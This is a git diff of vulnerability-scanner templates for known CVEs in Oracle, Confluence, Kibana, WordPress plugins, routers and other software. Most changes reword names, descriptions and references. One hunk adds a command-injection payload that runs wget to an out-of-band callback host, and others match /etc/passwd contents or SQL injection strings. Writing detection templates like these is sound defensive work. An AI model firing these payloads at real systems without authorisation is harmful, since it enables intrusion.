WebCenter Sites accessible data. + description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner + - https://nvd.nist.gov/vuln/detail/CVE-2019-2579 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 @@ -42,10 +42,12 @@ requests: matchers: - type: word words: - - "value='' and '1'='0 --" + - "value='' and '1'='0 --" - "Use this utility to view and manage URLs" condition: and - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml index 1e2f14f91d..03397b6412 100644 --- a/cves/2019/CVE-2019-2725.yaml +++ b/cves/2019/CVE-2019-2725.yaml @@ -1,15 +1,16 @@ id: CVE-2019-2725 info: - name: Oracle WebLogic Server - Unauthenticated RCE + name: Oracle WebLogic Server - Remote Command Execution author: dwisiswant0 severity: critical description: | - Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. reference: - https://paper.seebug.org/910/ - https://www.exploit-db.com/exploits/46780/ - https://www.oracle.com/security-alerts/cpujan2020.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-2725 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -42,4 +43,6 @@ requests: part: header - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index c709f7fb33..ac32801dfd 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -1,14 +1,13 @@ id: CVE-2019-3396 info: - name: Atlassian Confluence Path Traversal + name: Atlassian Confluence Server - Path Traversal author: harshbothra_ severity: critical - description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before - 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server - or Data Center instance via server-side template injection. + description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. reference: - https://github.com/x-f1v3/CVE-2019-3396 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3396 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -36,3 +35,5 @@ requests: - type: word words: - "contextConfigLocation" + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index 13dc83211a..75299c84cf 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -1,12 +1,10 @@ id: CVE-2019-3929 info: - name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) + name: Barco/AWIND OEM Presentation Platform - Remote Command Injection author: _0xf4n9x_ severity: critical - description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware - 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 - are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. reference: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ @@ -33,3 +31,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index 7130b339e6..c508e1ddf3 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -1,13 +1,13 @@ id: CVE-2019-5127 info: - name: YouPHPTube Encoder RCE + name: YouPHPTube Encoder 2.3 - Remote Command Injection author: pikpikcu severity: critical - description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in - YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + description: "YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php." reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 + - https://nvd.nist.gov/vuln/detail/CVE-2019-5127 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -47,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml index 7197f62498..4e8ab33741 100644 --- a/cves/2019/CVE-2019-6112.yaml +++ b/cves/2019/CVE-2019-6112.yaml @@ -1,13 +1,13 @@ id: CVE-2019-6112 info: - name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting + name: WordPress Sell Media 2.4.1 - Cross-Site Scripting author: dwisiswant0 severity: medium - description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter - (aka $search_term or the Search field). + description: "WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field)." reference: - https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b + - https://nvd.nist.gov/vuln/detail/CVE-2019-6112 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -29,4 +29,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index b64ee50c77..dcc8e406c2 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -1,13 +1,14 @@ id: CVE-2019-7238 info: - name: NEXUS < 3.14.0 Remote Code Execution + name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution author: pikpikcu severity: critical - description: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control. + description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 + - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -34,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 4de55c5a8e..5f2fb8e608 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -4,10 +4,11 @@ info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical - description: Linear eMerge E3-Series devices allow Command Injections. + description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. reference: - https://www.exploit-db.com/exploits/47619 - http://linear-solutions.com/nsc_family/e3-series/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-7256 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 @@ -34,3 +35,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index 8a30e8a9c6..270f3a4da0 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -1,14 +1,14 @@ id: CVE-2019-7609 info: - name: Kibana Timelion Arbitrary Code Execution + name: Kibana Timelion - Arbitrary Code Execution author: dwisiswant0 severity: critical - description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt - to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 @@ -39,4 +39,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml index 630e07c1fc..abd568261b 100644 --- a/cves/2019/CVE-2019-8982.yaml +++ b/cves/2019/CVE-2019-8982.yaml @@ -1,10 +1,10 @@ id: CVE-2019-8982 info: - name: Wavemaker Studio 6.6 Local File Inclusion/Server-Side Request Forgery + name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery author: madrobot severity: critical - description: WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery. + description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." reference: - https://www.exploit-db.com/exploits/45158 - https://nvd.nist.gov/vuln/detail/CVE-2019-8982 @@ -29,4 +29,5 @@ requests: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/04/18 + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 1588de7774..e49130eb92 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -1,10 +1,10 @@ id: CVE-2019-9618 info: - name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) + name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion author: daffainfo severity: critical - description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. + description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 @@ -32,3 +32,6 @@ requests: status: - 200 - 500 + + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index 6d92e4a9a8..8d9b7fa04e 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -1,10 +1,10 @@ id: CVE-2019-9670 info: - name: Zimbra Collaboration XXE + name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection author: ree4pwn severity: critical - description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability. + description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. reference: - https://www.exploit-db.com/exploits/46693/ - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories @@ -12,6 +12,7 @@ info: - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-9670 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -47,4 +48,7 @@ requests: - type: status status: - - 503 \ No newline at end of file + - 503 + + +# Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml index 723cd37237..15cb9c7839 100644 --- a/cves/2019/CVE-2019-9733.yaml +++ b/cves/2019/CVE-2019-9733.yaml @@ -1,17 +1,15 @@ id: CVE-2019-9733 info: - name: Artifactory Access-Admin Login Bypass + name: JFrog Artifactory 6.7.3 - Admin Login Bypass author: akshansh severity: critical - description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory - console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the - access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in - turn, assume full control of all artifacts and repositories managed by Artifactory. + description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. reference: - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html - https://www.ciphertechs.com/jfrog-artifactory-advisory/ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9733 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -43,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 1957415870..2e1267d2fc 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -1,10 +1,11 @@ id: CVE-2020-11034 info: - name: GLPI v.9.4.6 - Open redirect + name: GLPI <9.4.6 - Open Redirect author: pikpikcu severity: medium - description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. + description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. + remediation: Upgrade to version 9.4.6 or later. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip @@ -28,3 +29,6 @@ requests: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' part: header + + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index 08d4e91a41..2ed820eff0 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -1,13 +1,14 @@ id: CVE-2020-11529 info: - name: Grav 1.7 Open Redirect + name: Grav <1.7 - Open Redirect author: 0x_Akoko severity: medium - description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x. + description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. reference: - https://github.com/getgrav/grav/issues/3134 - https://www.cvedetails.com/cve/CVE-2020-11529 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11529 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -25,3 +26,6 @@ requests: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' part: header + + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11546.yaml b/cves/2020/CVE-2020-11546.yaml index 0cbc57646e..29207aceec 100644 --- a/cves/2020/CVE-2020-11546.yaml +++ b/cves/2020/CVE-2020-11546.yaml @@ -1,11 +1,10 @@ id: CVE-2020-11546 info: - name: SuperWebmailer Remote Code Execution + name: SuperWebmailer 7.21.0.01526 - Remote Code Execution author: Official_BlackHat13 severity: critical - description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to - execute arbitrary PHP code via Code Injection. + description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. reference: - https://github.com/Official-BlackHat13/CVE-2020-11546/ - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/ @@ -41,3 +40,5 @@ requests: - ajax_getemailingactions.php - ajax_getemailtemplates.php condition: and + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 239182d643..8277b5543e 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -1,7 +1,7 @@ id: CVE-2020-12116 info: - name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read + name: Zoho ManageEngine OpManger - Arbitrary File Read author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. @@ -48,4 +48,5 @@ requests: - 'status_code_2 == 200' condition: and -# Enhanced by mp on 2022/04/04 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-12447.yaml b/cves/2020/CVE-2020-12447.yaml index 1f6e2bcd29..53dfe1c9e7 100644 --- a/cves/2020/CVE-2020-12447.yaml +++ b/cves/2020/CVE-2020-12447.yaml @@ -4,10 +4,10 @@ info: name: Onkyo TX-NR585 Web Interface - Directory Traversal author: 0x_Akoko severity: high - description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal + description: "Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion." reference: - https://blog.spookysec.net/onkyo-lfi - - https://www.cvedetails.com/cve/CVE-2020-12447 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -30,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml index 3800e523e9..12a9047668 100644 --- a/cves/2020/CVE-2020-14092.yaml +++ b/cves/2020/CVE-2020-14092.yaml @@ -1,7 +1,7 @@ id: CVE-2020-14092 info: - name: WordPress PayPal Pro <1.1.65- SQL Injection + name: WordPress PayPal Pro <1.1.65 - SQL Injection author: princechaddha severity: critical description: "WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format." @@ -40,4 +40,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/04/27 +# Enhanced by mp on 2022/05/05 diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index 7160088ab0..e8c4dc4f04 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml @@ -1,12 +1,13 @@ id: CVE-2020-17453 info: - name: WSO2 Carbon Management Console - XSS + name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting author: madrobot severity: medium - description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 + - https://nvd.nist.gov/vuln/detail/CVE-2020-17453 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -34,3 +35,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-19360.yaml b/cves/2020/CVE-2020-19360.yaml index e6980e686d..64a9b6aa1b 100644 --- a/cves/2020/CVE-2020-19360.yaml +++ b/cves/2020/CVE-2020-19360.yaml @@ -1,7 +1,7 @@ id: CVE-2020-19360 info: - name: FHEM 6.0 Local File Inclusion + name: FHEM 6.0 - Local File Inclusion author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. @@ -28,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index d6d3ef4a66..97c2589e77 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -1,12 +1,13 @@ id: CVE-2020-2140 info: - name: Jenkin Audit Trail Plugin XSS + name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting author: j3ssie/geraldino2 severity: medium - description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: - https://www.jenkins.io/security/advisory/2020-03-09/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-2140 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-23575.yaml b/cves/2020/CVE-2020-23575.yaml index 6fe4b9c8b5..325fde225a 100644 --- a/cves/2020/CVE-2020-23575.yaml +++ b/cves/2020/CVE-2020-23575.yaml @@ -4,10 +4,10 @@ info: name: Kyocera Printer d-COPIA253MF - Directory Traversal author: 0x_Akoko severity: high - description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server. + description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server. reference: - https://www.exploit-db.com/exploits/48561 - - https://www.cvedetails.com/cve/CVE-2020-23575 + - https://nvd.nist.gov/vuln/detail/CVE-2020-23575 - https://www.kyoceradocumentsolutions.com.tr/tr.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -33,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index 7cd2a98c51..094373e691 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -1,14 +1,15 @@ id: CVE-2020-24223 info: - name: Mara CMS 7.5 - Reflective Cross-Site Scripting + name: Mara CMS 7.5 - Cross-Site Scripting author: pikpikcu severity: medium - description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters. + description: "Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters." reference: - https://www.exploit-db.com/exploits/48777 - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link + - https://nvd.nist.gov/vuln/detail/CVE-2020-24223 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -32,4 +33,6 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index e7dbad5cc5..bcc83ce260 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -27,13 +27,17 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + - | POST /auth HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + matchers-condition: and matchers: - type: status diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 0710e44e5b..2e2a5ad591 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -5,11 +5,11 @@ info: author: gy741 severity: critical description: | - A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. + Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,4 +35,6 @@ requests: - 'URLToken(cgi_path)' - 'pppoe' - 'wan' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml index 6cdacae68c..a3f58fab9b 100644 --- a/cves/2021/CVE-2021-20158.yaml +++ b/cves/2021/CVE-2021-20158.yaml @@ -1,11 +1,10 @@ id: CVE-2021-20158 info: - name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change + name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change author: gy741 severity: critical - description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is 